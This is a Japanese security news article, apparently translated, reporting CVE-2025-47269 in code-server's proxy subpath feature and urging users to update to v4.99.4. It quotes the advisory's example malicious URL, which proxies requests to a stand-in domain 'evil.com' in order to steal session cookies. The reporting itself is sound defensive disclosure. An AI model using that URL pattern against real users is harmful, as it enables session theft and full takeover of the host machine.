VS Code in the Browser at Risk: code-server Security Alert
2025/05/12 SecurityOnline — VS Code をブラウザで実行するために、広く利用される code-server プロジェクトに存在する脆弱性が、新たに公開されたセキュリティ・アドバイザリで明らかにされた。この脆弱性 CVE-2025-47269 (CVSS:8.3) を悪用する攻撃者は、ユーザー・セッションへの不正アクセスの可能性を手にする。
code-server プロジェクトは、GitHub で 71,000以上のスターを獲得しており、任意のマシン上での VS Code の実行と、Web ブラウザからのアクセスを、数多くの開発者に提供している。しかし、この利便性にはセキュリティ上の考慮事項が伴う。
この問題のコアは、code-server のプロキシ・サブパス機能にある。VS Code のアドバイザリには、「プロキシ・サブパスの悪用による作成された URL により、攻撃者に対して、セッション・トークンへのアクセスを許す可能性がある」と記されている。
この脆弱性は、プロキシ・リクエストのポートに対する不適切な検証に起因する。この欠陥を悪用する攻撃者は URL を操作し、任意のドメインへの接続を、code-server がプロキシするように仕向けられる。このアドバイザリでは、「悪意の URL “https:///proxy/test@evil.com/path” は “test@evil.com/path” にプロキシされ、攻撃者によるユーザー・セッション・トークンの窃取の可能性が生じる」と、明確な例が示されている。
本質的に、プロキシ機能はローカル・ポートへのアクセスを目的とするものだが、それを悪用する攻撃者は、プロキシを自身の悪意のサーバーにリダイレクトする、URL を作成することが可能となる。したがって、そのような悪意のリンクをユーザーがクリックすると、セッション Cookie が攻撃者のサーバへと送信されてしまう。このアドバイザリには、「通常において、この機能はローカル・ポートのプロキシに使用されるが、対象となる URL が攻撃者のドメインを参照する可能性がある。そのようなケースでは、接続が悪意のドメインにプロキシされ、Cookie の送信も行われてしまう」と記されている。
この脆弱性の影響は深刻である。ユーザーのセッション Cookie を取得する攻撃者は、認証を効果的にバイパスし、コード・サーバ・インスタンスを完全に制御できるようになる。
このアドバイザリが強調するのは、「セッション Cookie にアクセスする攻撃者は、code-server にログインし、code-server を実行するユーザーとして、その code-server をホストするマシンへのフルアクセスを得てしまう」という点だ。それにより攻撃者に許されるのは、サーバ上でのファイルの読取/変更/削除や、マルウェアのインストールなどであるが、その他にも、悪意の操作を達成する可能性があるだろう。
幸いなことに、パッチが提供されており、この脆弱性は修正されている。code-server ユーザーに対して強く推奨されるのは、最新バージョン v4.99.4 以降へと速やかにアップデートし、この重大なセキュリティ・リスクから身を守ることだ。
VS Code をブラウザで実行するためのオープンソース・プラットフォームである code-server に、脆弱性が発生しています。認証を回避し、コード・サーバ・インスタンスの完全な制御にいたる恐れがあるとのことです。VS Code を ご利用の開発者さんは、十分にご注意ください。よろしければ、VS Code で検索も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.